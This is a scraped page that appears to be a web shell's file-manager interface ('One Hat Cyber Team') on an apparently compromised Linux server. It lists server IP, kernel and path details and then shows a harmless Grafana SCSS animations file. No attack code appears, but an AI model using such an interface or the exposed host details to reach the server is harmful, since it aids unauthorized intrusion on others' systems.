⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.37
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
grafana
/
public
/
sass
/
mixins
/
View File Name :
_animations.scss
@mixin keyframes($animation-name) { @-webkit-keyframes #{$animation-name} { @content; } @-moz-keyframes #{$animation-name} { @content; } @-ms-keyframes #{$animation-name} { @content; } @-o-keyframes #{$animation-name} { @content; } @keyframes #{$animation-name} { @content; } } @mixin animation($str) { -webkit-animation: #{$str}; -moz-animation: #{$str}; -ms-animation: #{$str}; -o-animation: #{$str}; animation: #{$str}; } .animate-height { max-height: 0; overflow: hidden; &--open { max-height: 1000px; overflow: auto; transition: max-height 250ms ease-in-out; } } @keyframes spin-clockwise { 0% { transform: rotate(0deg) scaleX(-1); // scaleX flips the `sync` icon so arrows point the correct way } 100% { transform: rotate(359deg) scaleX(-1); } } .spin-clockwise { animation: spin-clockwise 3s infinite linear; }